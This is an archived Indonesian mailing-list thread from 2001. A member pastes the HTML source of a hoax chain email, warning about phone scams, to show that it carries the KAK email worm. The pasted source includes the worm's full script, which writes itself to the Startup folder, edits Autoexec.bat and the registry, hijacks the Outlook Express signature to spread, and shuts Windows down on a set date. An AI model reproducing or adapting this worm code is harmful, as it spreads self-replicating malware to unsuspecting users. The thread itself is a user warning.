Re: [ BaLUNg ] FW: [bhawikarsu93] Bacalah Email Ini

Yudho Jatmiko Thu, 18 Jan 2001 21:12:16 -0800
Nggak jelas info registernya.
Tolong donk di rapiin, penasaan nih pengen lihat registernya.
Mergane aku keno

Yudho

----- Original Message -----
From: Dudi Gurnadi <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, January 17, 2001 9:21 PM
Subject: Re: [ BaLUNg ] FW: [bhawikarsu93] Bacalah Email Ini


> On 16-Jan-2001, [EMAIL PROTECTED] wrote:
> > pirus dalem HTML
> > bercanda loh
>
> Ini gak bercanda..nih aku kasih source-nya..dari e-mail tsb.
>
> Liat..aja di baris-baris yang ada kalimat kak.hta atau kak.htm. Biasanya
> sering disebut virus KAK..dan mereka menyerang targetnya dengan menumpang
> melalui format e-mail HTML/attachment.
> Dia juga masuk ke registry..
> Biasanya dia akan menulari targetnya, jika attachmentnya dibuka.CMIIW
>
> Dudi
> ps: yang pernah kena virus KAK.
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> <HTML><HEAD>
> <META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
> <META content="MSHTML 5.00.2919.6307" name=GENERATOR>
> <STYLE></STYLE>
> </HEAD>
> <BODY bgColor=#ffffff>
> <DIV>&nbsp;</DIV>
> <DIV align=left class=OutlookMessageHeader dir=ltr><FONT face=Tahoma
> size=2>-----Original Message-----<BR><B>From:</B> Edwin Sarwedi
> [mailto:[EMAIL PROTECTED]]<BR><B>Sent:</B> Monday, January 15, 2001
4:03
> PM<BR><B>To:</B> [EMAIL PROTECTED]<BR><B>Subject:</B>
[bhawikarsu93]
> Bacalah Email Ini<BR><BR></FONT></DIV>
> <DIV><FONT face=Arial>Dear Arek-arek :</FONT></DIV>
> <DIV><FONT face=Arial>Buat yang punya HP, kayanya penting untuk berita ini
> :</FONT></DIV>
> <DIV><FONT face=Arial><BR>"Bila anda menerima telepon dari CELLNET dan
> mengatakan bahwa<BR>mereka<BR>sedang melakukan pengecekan terhadap HP
anda, maka:<BR><BR>SEGERA MATIKAN HP ANDA.<BR>Ada sebuah perusahaan penipu
yang akan
> menyuruh anda menekan<BR>&nbsp;# 90/90#, nomor tersebut akan mengakses SIM
anda
> dan melakukan<BR>sambungan<BR>telepon atas biaya/pulsa SIM
anda".<BR>Beritahukanpemberitahuan ini sebanyak mungkin pada
kenalan<BR>anda.<BR></DIV></FONT>
> <DIV><FONT face=Arial>Terima kasih.<BR>E100%</FONT></DIV>
> <DIV>
> <DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5"><FONT
> face=Arial>
> <OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
> id=scr></OBJECT></FONT></DIV>
> <SCRIPT><!--
> function sErr(){return
> true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver
> Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\"
> WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh'
>
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>fun
cti
> on sEr(){self.close();return true;}window.onerror=sEr;fs=new
>
ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.Get
Fol
> der(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new
> Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new
>
String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUDE~1\\\\PRO
GRA
>
~1\\\\DEMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak.ht
a';
>
k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\\\\AE.
KAK
>
';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if(hO.comma
ndL
>
ine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAsTextStream(8
);p
>
th=(kk==kfr)?wd+'MENUD?~1\\\\PROGRA~1\\\\D?MARR~1\\\\kak.hta':ken;t1.WriteLi
ne(
> '@echo off>'+pth);t1.WriteLine('del
>
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2)
.At
>
tributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.Write
Bla
>
nkLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Mi
cro
> soft\\\\Outlook
>
Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Defa
ult
>
Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\000
000
> 00]');t2.WriteLine('\"name\"=\"Signature
>
#1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"')
;t2
>
.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2
);t
> 2.WriteLine(ky+']');t2.Write('\"Signature
>
Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MAC
HIN
>
E\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('
\"c
>
Ag0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlan
kLi
> nes(2);t2.close();wsh.Run(wd+'Regedit.exe -s
>
'+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><
DIV
> style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT
> classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
>
id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z
');
> t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return
>
true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.clos
e()
>
;rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\
\\"
>
').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLanguage
)?n
>
avigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"C:\\\\\\\
\wi
> ndows\\\\\\\\Menu
>
Demarrer\\\\\\\\Programmes\\\\\\\\Demarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\win
dow
> s\\\\\\\\Start
>
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent
.to
>
LowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)
>4)
> )||(agt.indexOf(\"msie 5.\")!=-1))scr.write();');t3.write('//
> --></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();f
s.Get
> File(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new
> Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft
says not
> today !');wsh.Run(wd+'RUNDLL32.EXE
> user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc
failed
> &nbsp;
>
!]]%%%%%</"+"BODY></"+"HTML";la=(navigator.systemLanguage)?navigator.systemL
ang
> uage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu
> Demarrer\\Programmes\\Demarrage\\kak.hta":"C:\\windows\\Start
>
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if((
(ag
>
t.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("m
sie
> 5.")!=-1))scr.write();
> // --></SCRIPT>
> </OBJECT></DIV><BR><!-- |**|begin egp html banner|**| -->
> <TABLE border=0 cellPadding=2 cellSpacing=0>
>   <TBODY>
>   <TR bgColor=#ffffcc>
>     <TD align=middle><FONT color=#003399 size=-1><B>eGroups
>     Sponsor</B></FONT></TD></TR>
>   <TR bgColor=#ffffff>
>     <TD width=470><A
>
>
href="http://rd.yahoo.com/M=169066.1281467.2883016.2/D=egroupmail/S=17000434
64:
>
N/A=560429/*http://cgi.timeinc.net/cgi-bin/magsubs/cc/subs/ecompanynowcc1?EF
FOR
> TKEY=ECAAQN7"
>       target=_top><IMG alt="Click Here!" border=0 height=60
>
src="http://us.a1.yimg.com/us.yimg.com/a/fo/fortune/yahoo_ban3_ec.gif"
>       width=468 NOSEND="1"></A></TD></TR></TBODY></TABLE><!-- |**|end egp
html
> banner|**| --></BODY></HTML>
>
> ----------hapus footer ini jika anda ingin me-reply--------
> untuk berhenti langganan, kirim email kosong ke:
> [EMAIL PROTECTED]
> archive milis ada di :
> http://www.mail-archive.com/milis-balung@brawijaya.ac.id
>


----------hapus footer ini jika anda ingin me-reply--------
untuk berhenti langganan, kirim email kosong ke:
[EMAIL PROTECTED]
archive milis ada di :
http://www.mail-archive.com/milis-balung@brawijaya.ac.id
Re: [ BaLUNg ] FW: [bhawikarsu93] Bacalah Email Ini

Reply via email to
